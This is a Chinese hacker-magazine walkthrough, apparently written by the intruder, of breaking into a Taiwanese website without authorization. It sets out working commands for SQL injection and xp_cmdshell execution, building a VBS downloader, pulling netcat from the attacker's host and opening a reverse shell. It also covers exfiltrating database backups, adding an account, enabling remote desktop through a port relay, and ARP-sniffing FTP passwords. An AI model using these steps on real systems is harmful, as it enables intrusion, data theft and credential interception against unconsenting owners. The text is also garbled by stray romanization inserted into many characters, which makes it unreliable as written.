很久沒(méi)有入侵了，手有點(diǎn)癢，隨便逛了幾個(gè)TW的網(wǎng)站想找一個(gè)有點(diǎn)的價(jià)值的網(wǎng)站玩玩，于是找到了這個(gè)網(wǎng)站。 習(xí)慣性的，在“報(bào)名賬號(hào)”處填入了一個(gè)單引號(hào)，返回了如下信息： SQL Server 的 Microsoft OLE DB 提供者 (0x80040E14) 遺漏字符字符串 ''' 前面的引號(hào)。 /rdshow/modify.asp, line 5 看來(lái)是存在注入漏洞的，來(lái)看看權(quán)限如何。繼續(xù)在登陸口輸入’ and user>0 and ‘’=’，問(wèn)題出現(xiàn)了：無(wú)法完整輸入?？磥?lái)網(wǎng)頁(yè)對(duì)輸入長(zhǎng)度做了限制，這個(gè)難不到我。保存網(wǎng)頁(yè)，將網(wǎng)頁(yè)的源代碼更改兩個(gè)地方，一處是Action＝modify.asp改為Action＝ [url=http://www.xxx.org.tw/rdshow/modify.asp]http://www.xxx.org.tw/rdshow/modify.asp[/url] ，還有一處就是把輸入字符的長(zhǎng)度改大，也就是maxlength＝10改為100，這下可以不受限制的隨便輸入了。將剛才的代碼完整輸入后得到以下信息： SQL Server 的 Microsoft OLE DB 提供者 (0x80040E07) 將 nvarchar 數(shù)值 'dbo' 轉(zhuǎn)換成數(shù)據(jù)型別為 int 的數(shù)據(jù)行語(yǔ)法錯(cuò)誤。 /rdshow/modify.asp, line 5 看來(lái)有戲，但是這樣注入太麻煩了。再看看網(wǎng)頁(yè)的源代碼，如果將這個(gè)注入漏洞轉(zhuǎn)化成URL的形式，這樣注入就方便多了。同時(shí)轉(zhuǎn)化后還有一個(gè)很好的優(yōu)點(diǎn)，就是可以使用NBSI之類(lèi)的注入工具，大大簡(jiǎn)化了我們的注入過(guò)程。轉(zhuǎn)化后的URL為 [url=http://www.xxx.org.tw/rdshow/]http://www.xxx.org.tw/rdshow/[/url] modify.asp？bidno=f**k?，F(xiàn)在WEB和SQL的主機(jī)分開(kāi)的情況很多，首先我們還是先看看數(shù)據(jù)庫(kù)的IP地址吧。打開(kāi)天網(wǎng)，然后在IE提交： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec[/url] master.dbo.xp_shell’ ping myip’;-- 從天網(wǎng)的報(bào)警日志看出數(shù)據(jù)庫(kù)的IP地址為210.208.xxx.253，再Ping [url=http://www.xxx.org.tw]www.xxx.org.tw[/url] ，得到的IP地址卻為210.208.xxx.32，看來(lái)數(shù)據(jù)庫(kù)和WEB服務(wù)器不是同一臺(tái)主機(jī)，但是從IP分布來(lái)看，這兩臺(tái)主機(jī)處于同一個(gè)網(wǎng)段，理論上只要我們能攻占下數(shù)據(jù)庫(kù)主機(jī)，要滲透到WEB服務(wù)器也不是難事（后來(lái)證明確實(shí)如此）。到了這一步，還是先用Superscan掃描一下數(shù)據(jù)庫(kù)主機(jī)開(kāi)了些什么端口吧。 小提示：先對(duì)數(shù)據(jù)庫(kù)服務(wù)器掃描的好處有很多，比如可以探測(cè)對(duì)方是否開(kāi)了防火墻，是否有FTP或者WEB服務(wù)，這樣才能確定下一步該怎么注入。 掃描的結(jié)果是數(shù)據(jù)庫(kù)有防火墻，我的想法是先上傳一個(gè)NC上去，先得到一個(gè)反向的Shell再說(shuō)。我嘗試了很多方法才傳上去，先用Tftp沒(méi)有成功，F(xiàn)TP也沒(méi)有成功。如果數(shù)據(jù)庫(kù)有WEB服務(wù)的話還可以寫(xiě)入一個(gè)WebShell，可惜沒(méi)有。沒(méi)有辦法，只好寫(xiě)Iget.vbs（腳本小子：廣告時(shí)間！黑防上個(gè)月開(kāi)放的下載系統(tǒng)中有下載，地址是 [url=http://www.hacker.com.cn/downweb/index.asp]www.hacker.com.cn/downweb/index.asp[/url] ，里面還有一些小東西也挺不錯(cuò)，歡迎大家下載使用，并推薦你覺(jué)得功能上有特點(diǎn)的程序），然后讓對(duì)方下載我WEB服務(wù)器上的NC。好，決定后就這樣做，繼續(xù)在IE提交： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo iLocal = LCase(WScript.Arguments(1)) > c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo iRemote = LCase(WScript.Arguments(0)) >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo xPost.Open "GET",iRemote,0 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo xPost.Send() >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo Set sGet = CreateObject("ADODB.Stream") >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Mode = 3 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Type = 1 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Open() >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Write(xPost.responseBody) >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.SaveToFile iLocal,2 >>c:\winnt\system\p.vbs';-- 現(xiàn)在把NBSI2請(qǐng)出來(lái)，用其自帶的NB command命令執(zhí)行器查看VBS是否寫(xiě)入成功（用NB TreeList目錄列表工具也可以，不過(guò)要等半天才能等到結(jié)果，我的性子急，所以選擇了前者）。 可以看出VBS生成成功了，現(xiàn)在我們可以用這個(gè)VBS去下載后門(mén)木馬之類(lèi)的東西了。話不多說(shuō)先把Tlist，NC，Kill傳上去再說(shuō)，繼續(xù)在IE提交如下URL： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/nc.exe]http://myip/nc.exe[/url] nc.exe';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/kill.exe]http://myip/kill.exe[/url] kill.exe';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/tlist.exe]http://myip/tlist.exe[/url] tlist.exe';-- 現(xiàn)在我們可以利用上傳的NC得到一個(gè)反向的Shell了，先在本機(jī)用NC監(jiān)聽(tīng)8000端口： Nc.exe –l –v –p 8000 然后在IE輸入： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\nc.exe –e cmd.exe myip 8000 ';-- 這樣我們就獲得了一個(gè)CmdShell了。 為什么我要上傳Tlist呢？因?yàn)槲蚁胫缹?duì)方用的是什么殺毒軟件，這樣我們才能做到有的放矢，不至于我們上傳的東東全部被查殺。上傳Tlist還有一個(gè)原因就是剛剛開(kāi)始我在繞過(guò)對(duì)方的防火墻時(shí)調(diào)用了FTP，為了不讓對(duì)方懷疑，我必須把它Kill掉，所以也得上傳Tlist來(lái)看看PID號(hào)。Tlist的結(jié)果是對(duì)方用的諾頓。 小提示：獲取對(duì)方系統(tǒng)的殺毒軟件對(duì)后面的入侵是很有幫助的，因?yàn)椴煌臍⒍拒浖?duì)不同的黑軟定義的特征碼是不一樣的，也就是說(shuō)某些黑軟不被金山查殺，不代表可以瞞過(guò)諾頓，反之一樣。 暈了，我菜，只會(huì)找瑞星的特征碼，諾頓的找不出來(lái)，想傳幾個(gè)反彈木馬上去的想法放棄了。上去溜了一圈發(fā)現(xiàn)D盤(pán)下面有不少數(shù)據(jù)庫(kù)的備份，我喜歡，先Down下來(lái)再說(shuō)。但新的問(wèn)題又來(lái)了，Tftp和TTP不能用，對(duì)方又有硬件防火墻，而Iget.vbs又只能下載，沒(méi)有辦法上傳東西，反彈木馬可以實(shí)現(xiàn)上傳但對(duì)方又有殺毒軟件……現(xiàn)在我的思路開(kāi)始陷入困境，正在我一籌莫展的時(shí)候我想到了飯哥，他應(yīng)該有點(diǎn)好東東可以解決我的這個(gè)問(wèn)題吧？把大概情況給他說(shuō)了之后，他仰天大笑三聲之后給了我一個(gè)他自己寫(xiě)的小工具：HttpPut，這個(gè)工具可以將對(duì)方的文件傳到自己的電腦上來(lái)，簡(jiǎn)單方便。使用方法為： Useag:E:\HttpPut.exe [URL] [PutFilePath] Sample:E:\HttpPut.exe [url=http://hostname/images/]http://hostname/images/[/url] c:\p.txt 先傳了幾個(gè)Word文件，一切正常，但是當(dāng)我傳到后面較大的數(shù)據(jù)庫(kù)文件時(shí)卻發(fā)現(xiàn)不太穩(wěn)定，Shell很容易掛掉，嘗試了很多次都這樣（汗，這時(shí)進(jìn)程里面多了X個(gè)Cmd.exe，幸好我上傳了Tlist和Kill，把那些掛了的CMD一個(gè)一個(gè)地Kill掉）。 又一次陷入了困境，我本來(lái)想再去各大黑客網(wǎng)站找最新的反彈木馬，但是老天偏偏和我作對(duì)，找了半天都找不到一個(gè)滿意的。就在我快絕望的時(shí)候我的眼前突然一亮：NC不就可以突破防火墻傳文件嗎？不然怎么叫瑞士軍刀？看來(lái)我是騎驢找驢了。在NC的高級(jí)應(yīng)用里面就有傳文件的方法，具體命令如下： nc －vv -l -p port > pathfile　　 nc -d myip port 然后用Winrar將所有文件（5個(gè)）打包為自解壓的exe，并將“高級(jí)自解壓選項(xiàng)”->“解壓后運(yùn)行”設(shè)置為_(kāi)wpcap_.bat，命令行的Winpcap安裝包就制作完成了。 以上方法只是給大家參考，此時(shí)我已經(jīng)有了另外的更加簡(jiǎn)單方便的思路，就是給數(shù)據(jù)庫(kù)的主機(jī)開(kāi)終端服務(wù)，這樣無(wú)論是傳東西還是繼續(xù)向內(nèi)網(wǎng)的滲透都會(huì)方便很多。大家也許會(huì)問(wèn)即使你有權(quán)限添加賬號(hào)能開(kāi)終端服務(wù)，但是對(duì)方有防火墻你怎么連接啊。呵呵，這個(gè)問(wèn)題其實(shí)很好解決，相信大家都知道VIDC類(lèi)軟件吧，這類(lèi)軟件的作用就是將內(nèi)網(wǎng)的端口映射到公網(wǎng)的IP端口上來(lái)，這樣我們只需要連接公網(wǎng)的IP就可以連接到內(nèi)網(wǎng)去了。在這里我用的是yyc寫(xiě)的VIDC軟件的修改版， 小知識(shí)：yyc寫(xiě)的VIDC軟件的修改版分客戶端和服務(wù)器端，服務(wù)器端Idc.exe在具有公網(wǎng)IP的肉雞上運(yùn)行，使用默認(rèn)8080端口通信。 直接在肉雞運(yùn)行就OK了，客戶端vIDCc.exe、vIDCc.DLL，xl.ini文件，按INI文件里的配置自動(dòng)連接綁定端口，INI的內(nèi)容如下： Serverip＝公網(wǎng)IP Serverport＝8080 Cip＝127.0.0.1 Bport=21|80|3389 Yport=7779|7776|7778 先還是用Iget.vbs將這些東西傳上去，然后在CmdShell里面添加一個(gè)賬號(hào)，然后寫(xiě)一個(gè)BAT開(kāi)啟3389，等電腦重啟之后再上去運(yùn)行vIDCc.exe。OK大功告成，我們只要登陸肉雞的7778端口就可以訪問(wèn)內(nèi)網(wǎng)數(shù)據(jù)了。 呵呵，現(xiàn)在我們可以在圖形界面下安裝Winpcap了，我們已經(jīng)完全控制了數(shù)據(jù)庫(kù)，但是任務(wù)還沒(méi)有完，我們先看看能不能嗅探到WEB服務(wù)器的信息。先執(zhí)行下面的命令： tracert 210.208.xxx.32（WEB服務(wù)器的地址） 看看返回結(jié)果看來(lái)有戲，三下五除二裝好Winpcap，然后開(kāi)始ArpSniffer，嗅探的命令為： Usage: ArpSniffer [/RESET] 在這里我監(jiān)聽(tīng)的是21端口，命令如下： Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c:\winnt\system\pass.txt 1 接下來(lái)就是等待了，不過(guò)臭要飯的急著催文章，所以文章截至?xí)r還沒(méi)有結(jié)果，如果大家有興趣的話，下期我再告訴大家。這次簡(jiǎn)單任務(wù)也該結(jié)束了，下期見(jiàn)！

最新評(píng)論